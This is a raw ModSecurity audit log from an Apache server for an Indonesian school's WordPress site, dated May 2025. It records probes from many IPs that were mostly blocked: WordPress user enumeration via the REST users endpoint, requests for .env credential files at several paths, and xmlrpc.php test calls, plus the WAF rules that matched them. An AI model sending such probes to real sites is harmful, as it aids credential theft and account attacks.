"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746809105982083 5270 (- - -) Stopwatch2: 1746809105982083 5270; combined=3963, p1=517, p2=3226, p3=30, p4=32, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a80eb77-Z-- --1239bb6c-A-- [09/May/2025:23:56:38 +0700] aB4zxi-fAO47ojYKsMr6HgAAAFg 103.236.140.4 57820 103.236.140.4 8181 --1239bb6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.41.236.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.41.236.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1239bb6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1239bb6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809798569790 2351 (- - -) Stopwatch2: 1746809798569790 2351; combined=1131, p1=366, p2=738, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1239bb6c-Z-- --00e5e46b-A-- [09/May/2025:23:59:20 +0700] aB40aC-fAO47ojYKsMr6IAAAAEw 103.236.140.4 57826 103.236.140.4 8181 --00e5e46b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) Accept-Charset: utf-8 --00e5e46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00e5e46b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746809960926161 801 (- - -) Stopwatch2: 1746809960926161 801; combined=352, p1=304, p2=0, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00e5e46b-Z-- --13b37170-A-- [09/May/2025:23:59:37 +0700] aB40eS-fAO47ojYKsMr6IQAAAEg 103.236.140.4 57828 103.236.140.4 8181 --13b37170-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13b37170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13b37170-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809977661053 3284 (- - -) Stopwatch2: 1746809977661053 3284; combined=1447, p1=487, p2=928, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13b37170-Z-- --9c206443-A-- [09/May/2025:23:59:41 +0700] aB40fS-fAO47ojYKsMr6IwAAAFY 103.236.140.4 57832 103.236.140.4 8181 --9c206443-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c206443-C-- demo.sayHello --9c206443-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c206443-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746809981237012 5213 (- - -) Stopwatch2: 1746809981237012 5213; combined=3904, p1=477, p2=3210, p3=27, p4=27, p5=95, sr=84, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c206443-Z-- --b4c78703-A-- [10/May/2025:00:26:09 +0700] aB46sR6q_ZMebht3q14lKQAAAIk 103.236.140.4 58014 103.236.140.4 8181 --b4c78703-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.113.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.113.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b4c78703-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4c78703-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746811569905473 3285 (- - -) Stopwatch2: 1746811569905473 3285; combined=1348, p1=475, p2=844, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4c78703-Z-- --9ffec805-A-- [10/May/2025:00:48:27 +0700] aB4_61qQ1nOVx9fWpZSxtwAAAAw 103.236.140.4 58118 103.236.140.4 8181 --9ffec805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ffec805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ffec805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746812907242547 3194 (- - -) Stopwatch2: 1746812907242547 3194; combined=1360, p1=469, p2=859, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ffec805-Z-- --9e11f411-A-- [10/May/2025:00:48:33 +0700] aB4_8VoC-7ITMWTA_c9fiAAAAMg 103.236.140.4 58122 103.236.140.4 8181 --9e11f411-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e11f411-C-- demo.sayHello --9e11f411-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e11f411-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746812913430925 4743 (- - -) Stopwatch2: 1746812913430925 4743; combined=3761, p1=460, p2=3033, p3=23, p4=26, p5=157, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e11f411-Z-- --856de324-A-- [10/May/2025:00:59:38 +0700] aB5CilqQ1nOVx9fWpZSxwAAAABE 103.236.140.4 58644 103.236.140.4 8181 --856de324-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.189.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.189.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --856de324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --856de324-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746813578628712 2911 (- - -) Stopwatch2: 1746813578628712 2911; combined=1304, p1=473, p2=801, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --856de324-Z-- --c8385313-A-- [10/May/2025:01:01:39 +0700] aB5DAx6q_ZMebht3q14lOAAAAJA 103.236.140.4 58810 103.236.140.4 8181 --c8385313-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --c8385313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8385313-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813699438209 663 (- - -) Stopwatch2: 1746813699438209 663; combined=276, p1=246, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8385313-Z-- --20d0e117-A-- [10/May/2025:01:01:39 +0700] aB5DAy-fAO47ojYKsMr6QgAAAFg 103.236.140.4 58812 103.236.140.4 8181 --20d0e117-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --20d0e117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d0e117-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813699783226 684 (- - -) Stopwatch2: 1746813699783226 684; combined=294, p1=255, p2=0, p3=0, p4=0, p5=39, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d0e117-Z-- --036d3a2d-A-- [10/May/2025:01:01:40 +0700] aB5DBFoC-7ITMWTA_c9fjgAAANE 103.236.140.4 58814 103.236.140.4 8181 --036d3a2d-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --036d3a2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --036d3a2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813700122286 671 (- - -) Stopwatch2: 1746813700122286 671; combined=272, p1=224, p2=0, p3=0, p4=0, p5=48, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --036d3a2d-Z-- --498b170b-A-- [10/May/2025:01:01:40 +0700] aB5DBC-fAO47ojYKsMr6QwAAAEU 103.236.140.4 58816 103.236.140.4 8181 --498b170b-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --498b170b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --498b170b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813700465228 639 (- - -) Stopwatch2: 1746813700465228 639; combined=263, p1=231, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498b170b-Z-- --a3cf203b-A-- [10/May/2025:01:01:41 +0700] aB5DBR6q_ZMebht3q14lOQAAAIo 103.236.140.4 58820 103.236.140.4 8181 --a3cf203b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --a3cf203b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3cf203b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813701159780 713 (- - -) Stopwatch2: 1746813701159780 713; combined=320, p1=287, p2=0, p3=0, p4=0, p5=33, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3cf203b-Z-- --86b4a746-A-- [10/May/2025:01:09:46 +0700] aB5E6lqQ1nOVx9fWpZSxzgAAAAs 103.236.140.4 58900 103.236.140.4 8181 --86b4a746-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.160.122.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.160.122.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86b4a746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86b4a746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814186269575 2782 (- - -) Stopwatch2: 1746814186269575 2782; combined=1220, p1=406, p2=786, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86b4a746-Z-- --dfc77900-A-- [10/May/2025:01:15:28 +0700] aB5GQFqQ1nOVx9fWpZSx0gAAAAE 103.236.140.4 58914 103.236.140.4 8181 --dfc77900-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfc77900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc77900-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814528582950 3029 (- - -) Stopwatch2: 1746814528582950 3029; combined=1351, p1=468, p2=848, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc77900-Z-- --e3f69c63-A-- [10/May/2025:01:15:33 +0700] aB5GRVqQ1nOVx9fWpZSx0wAAAAw 103.236.140.4 58918 103.236.140.4 8181 --e3f69c63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3f69c63-C-- demo.sayHello --e3f69c63-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f69c63-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814533699948 5864 (- - -) Stopwatch2: 1746814533699948 5864; combined=4361, p1=554, p2=3490, p3=33, p4=124, p5=95, sr=100, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f69c63-Z-- --ede29010-A-- [10/May/2025:01:16:52 +0700] aB5GlFqQ1nOVx9fWpZSx1QAAAAk 103.236.140.4 58924 103.236.140.4 8181 --ede29010-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ede29010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ede29010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814612878574 3489 (- - -) Stopwatch2: 1746814612878574 3489; combined=1435, p1=484, p2=919, p3=0, p4=0, p5=31, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
